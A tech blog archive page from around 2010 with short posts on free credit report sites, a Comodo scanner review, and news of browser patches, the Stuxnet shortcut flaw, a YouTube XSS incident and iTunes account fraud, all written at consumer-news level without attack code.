Free Credit Reports from CreditKarma

shield-green-check-ico When you are looking for free credit reports, be careful where you go. There are plenty of very shady (almost evil) websites out there that offer you services that may cost you plenty if you aren’t careful. Have you seen the TV commercials for I checked them out at the Better Business Bureau and they were rated with an F. That’s bad, very bad.

ckLogoRecently, I’ve seen one service that appears to be safe and highly recommended. The service at checked out with an Arating at the Better Business Bureau and it’s even registered as an Accredited Businessthere. Here’s what Credit Karma says about their service:

Credit Karma believes consumers have a right to know this information with no charge or without the bait and switch of 30 days free followed by enrollment products with confusing opt outs. We subsidize our cost of pulling the credit scores by selling advertising on the site.

They offer several reports and even some tools for helping you improve your future scores. The only complaints I’ve seen so far, are people reporting that the FICO scores are sometimes inaccurate. Since the only other FICO scores you can get are not free, you may decide you can live with results that aren’t perfect.


Here’s a nice tour of the Credit Karma service that was created for Sears credit cards.

In addition to Credit Karma,  another truly free place to get yearly credit reports is at the Annual Credit Report site.


Not all free credit reports are created equal. You can always check with the Better Business Bureau before you give personal information to a website.

Windows Shell Shortcut Vulnerability Is Being Actively Exploited

Earlier this week the exploit code for a highly critical Windows vulnerability affecting all versions of Windows from XP to 7 was made public. The bad news is that malware developers are already actively exploiting this bug. Symantec has identified that the W32.Stuxnet worm, which spreads using this vulnerability, has already affected thousands of systems.

The Shell Shortcut Parsing vulnerability is a particularly worrisome bug because there aren’t a lot of things a user can do to protect himself. Even if autorun and autoplay is disabled, users can still get infected. All that the user is required to do is to open the compromised device, network share or WebDav. The only preventive measure is to disable icon rendering. However, doing so will basically cripple the Windows environment. To make matters worse, Steve Gibson from GRC research is claiming that a security researcher has already figured out a way to exploit this vulnerability through favicons.

Microsoft is obviously working hard to patch this severe vulnerability. However, an official patch may take weeks to come. Until then, ensure that your system has up-to-date malware protection, and avoid using Internet Explorer (other browsers can also be exploited, but possibly to a lesser degree).

Online Home Tech Support with Comodo Cloud Scanner

[Windows all] Have you ever heard of a software company named Comodo? I first spotted them a few years ago, when they offered a free Firewall program. Even then, I knew it was a company worth watching. Each year, Comodo seems to be offering bigger and better security apps, and many of them are free for home users.

Here’s a peek at their free protection page:


As you can see, there isn’t much in the PC security field that they don’t cover. I’m sure that I could run a safe PC using only their free offerings.

The freebie I tried most recently is called Comodo Cloud Scanner. The description for this piece of software fooled me. Quote: Scan your PC to identify malware, junk files, registry errors and hidden processes. I assumed that it was simply a scanner that advised you about security risks and offered advice. I’ll show you what I ran into and why I was so surprised.

First I downloaded and installed the 10mb exe file. Here’s what the first screen looked like:


I clicked the Scan Now button and waited while it cranked away. Here are the results I saw when it finished.


Holy Cow! Over 3000 errors?

I was surprised and a bit aggravated. The last time I saw results like this was when I was testing out some suspected scamware at MyCleanPC. Any time I see extreme results like this, I always suspect that someone is trying very hard to sell me a solution I don’t need.

At the bottom of the scan results, was this little button.


I thought about this for a few minutes. I was still angry about the results. I looked through the details of the results and they really weren’t security problems as I’d define them. Most of it was browser cache files, junk registry entries and cookies. That really pissed me off, and I decided that I had to see what kind of help they’d offer.

I clicked on the Help Me button and waited for a live connection to one of the Comodo people. A pretty basic looking chat window finally popped up and I was connected to Chris in New Jersey. Below is the dialog (I’m the subscriber):



Well, that explained it all to me. The scan is simply a ploy to get you into their online help service. I’m kind of wondering what results I’d get if I had used the Comodo System Cleaner before I had scanned. That test will have to wait on another day.

Techie Buzz Verdict:

The scan that Comodo Cloud Scanner performs on your system is very likely quite good. However, I hate the way they label the findings as Errors and Problems. The so called errors and problems they found are the stuff that happens on your PC as a simple result of using it every day.

I will give them credit for this much; the LivePCSupport service that Comodo provided to me was professional and very timely. If you need a good remote help service, I don’t think you will find many others that are priced this low. Since Comodo offers all of those free security applications, I’m sure they know how to use them to help people. I can’t praise the online service because I haven’t really used it, however, I wouldn’t be afraid to recommend it to a newbie who could really benefit from it. Fifty bucks isn’t too much for most people. Especially if it saves them hours of frustration.

Techie Buzz Rating: Scanner: 2/5 (Poor) / Online Service: 3/5 (Good)

Mozilla Fixes 14 Security Issues with Firefox 3.6.7

Firefox Next week, the Black Hat Security Conference is scheduled to take place at Las Vegas. Undoubtedly, hackers attending the event are getting ready with their proof of concepts and exploits. In fact, one security analyst is already making the headlines for discovering security holes in Firefox, Internet Explorer, Chrome and Safari.

In the run up to the event, Mozilla is doing its best to keep hackers at bay by patching up as many vulnerabilities as possible. Yesterday, they released Firefox 3.6.7, which is a recommended stability and security update. This release patches 8 critical vulnerabilities including some that could allow remote arbitrary code execution.

The full change log along with information about each of the fixed vulnerabilities is available here. Earlier this month, Google had also patched as many as 10 vulnerabilities in a Chrome security update.

[ Download Firefox 3.6.7 ]

Safari, Internet Explorer, Firefox and Chrome Leak Sensitive User Information to Websites

Black-Hat-Conference Most of us don’t think twice before saving sensitive information in our browser’s auto-fill database. After all, browsers are desktop applications that reside on our system. So, any data we store in our browser should remain private, right? Wrong.

Jeremiah Grossman, CTO of White Hat Security, has managed to uncover security holes in each of the major browsers that can be exploited by booby trapped websites to gain access to sensitive information.

“Right at the moment a Safari user visits a website, even if they’ve never been there before or entered any personal information, a malicious website can uncover their first name, last name, work place, city, state, and email address”, revealed Grossman in a blog post. According to the proof of concept demonstrated by him, it is possible to fool Safari (v4 and v5) into giving up stored form auto-fill information without user intervention using JavaScript. Apple, which was notified about this vulnerability back in June, has yet to respond.

Internet Explorer 6 and 7 can also be exploited in a similar fashion. However, Internet Explorer 8 appears to be safe for the moment. If you are using the any of the affected browsers, it’s highly recommended that you disable the in-built AutoFill functionality for the time being.

The Register is also reporting that Grossman has discovered critical XSS (cross-site scripting) vulnerabilities in Firefox and Chrome, which can be exploited to gain access to stored website passwords. Grossman is expected to reveal more at the Black Hat Security Conference, which is going to be held next week.

Apple Bans Rogue Developer: Confirms iTunes Fraud

Apple Apple has finally stepped in to put an end to the increasing incidents of fraudulent purchases in the iTunes App Store. Last week, we reported that someone called Thuat Nguyen was purchasing his own applications using hacked iTunes accounts. In fact, apps developed by Nguyen managed to claim 42 of the top 50 spots in the App Store rankings for the Books category.

Apple has now banned Thuat Nguyen and issued the following statement to Engadget:

The developer Thuat Nguyen and his apps were removed from the App Store for violating the developer Program License Agreement, including fraudulent purchase patterns.

Developers do not receive any iTunes confidential customer data when an app is downloaded.

If your credit card or iTunes password is stolen and used on iTunes we recommend that you contact your financial institution and inquire about canceling the card and issuing a chargeback for any unauthorized transactions. We also recommend that you change your iTunes account password immediately. For more information on best practices for password security visit

According to Clayton Morris, about four hundred iTunes accounts were compromised. Apple’s statement indicates that the hacking resulted out of callousness on the part of the user and not due some inherent vulnerability in iTunes. Nevertheless, Apple will be beefing up its security measures to make it harder for hacked accounts to be exploited.

YouTube XSS Vulnerability Fixed [Official Statement]

YouTube-Vulnerability Earlier today, a critical cross-site scripting (XSS) vulnerability was uncovered in YouTube. It now appears that the source of these attacks was Ebaumsworld, with 4Chan later chipping in to propagate it. Of course, both sides are accusing the other of the wrong doing.

Google swung into action fairly quickly, and the vulnerability has now been fixed. Jay Nancarrow, a spokesman for Google, reached out to us to issue the following statement:

We took swift action to fix a cross-site scripting (XSS) vulnerability on that was discovered several hours ago. Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.

In spite of Google’s swift response, the script kiddies managed to cause a fair amount of annoyance. A large selection of popular YouTube videos, especially Justin Bieber videos, were flooded with malicious comments. Fortunately for us, while obnoxious, most of these scripts did little damage other than irritating viewers.

iTunes Accounts Hacked – Several Users Report Fraudulent Purchases

AppleA little while ago, YouTube was hacked and exploited on a large scale. Unfortunately, YouTube is not the only major service to fall prey to hackers. Two iPhone application developers have uncovered what appears to be a widespread hacking of the iTunes App Store.

Patrick Thomson, the developer of the QuickReader iPhone application, was the first to notice that something was amiss, when his app was displaced in the rankings by numerous suspicious looking Vietnamese manga apps.


It appears that someone going by the name Thuat Nguyen managed to hack into people’s accounts and buy his own apps to push them up the app store rankings. The scale of the attack, as well as the methodology used isn’t known. However, the number of people who have been compromised is definitely significant. This particular thread on MacRumors forum paints a worrisome picture. Several users have been charged hundreds of dollars for purchases they never made. To make matters worse, Apple’s customer care isn’t being very helpful either.

If you have associated a credit/debit card with your iTunes account, you should immediately check your recent purchase history and remove your card from your iTunes profile.

Image Courtesy: Alex Brie

Warning: Highly Critical XSS Vulnerability Discovered in YouTube

YouTube-VulnerabilityIt appears that YouTube is vulnerable to XSS (cross-site scripting) attacks. Details are scarce since this is a breaking story. However, according to preliminary information available with us, it is possible to hijack cookies to gain access to a logged-in user’s Gmail and YouTube accounts.

Although, it’s unclear who discovered this vulnerability, 4Chan users are already trying to actively exploit it. The exploit makes use of PHP, JavaScript, and XSS, and is being spread through comments on videos. Any logged in user who has browsed to an infected page is vulnerable. The best solution is to completely log out of YouTube until this issue has been fixed. If you are worried that you have viewed an infected video, delete all your cookies.

Spread the word to your friends and family members and help them stay protected. We will update you as soon as we learn more.

Update 1: TheNextWeb is reporting that Justin Bieber videos are being targeted in a big way.

Update 2: YouTube has now blocked all scripts from comments. However, video titles are also vulnerable and video responses are now being used to exploit the vulnerability.

Update 3: Google has issued an official statement.

Opera 10.54 Fixes Multiple Security Issues

Opera-10.54 Opera Software has just released Opera 10.54, which is a highly recommended security update. This release fixes multiple security issues, including one which allowed Opera to be used as a vehicle for exploiting a flaw in font handling in Windows operating system. Here is the full changelog:

  • Prevented Opera from being used as a vector for a font issue in the underlying operating system, as reported by Microsoft’s security team; see our advisory.
  • Fixed an extremely severe issue; details will be disclosed at a later date.
  • Fixed a highly severe issue; details will be disclosed at a later date.
  • Fixed a moderately severe issue; details will be disclosed at a later date.
  • Fixed a less severe issue; details will be disclosed at a later date.

As you can see, the Norwegian browser maker has been surprisingly vague while describing the security vulnerabilities that have been fixed in this release. The most probable reason for this is “responsible disclosure”. Opera’s changelog strongly hints that other applications (most probably browsers) are also vulnerable to the same exploits.

Last week, Opera Software released Opera 10.60 Beta 1, which propelled Opera to the front of the pack once again, in terms of rendering speed. The good news is that, if you are using Opera 10.60 Beta 1 or a newer build, you are already protected and you don’t need to downgrade to Opera 10.54.

[ Download Opera 10.54 ]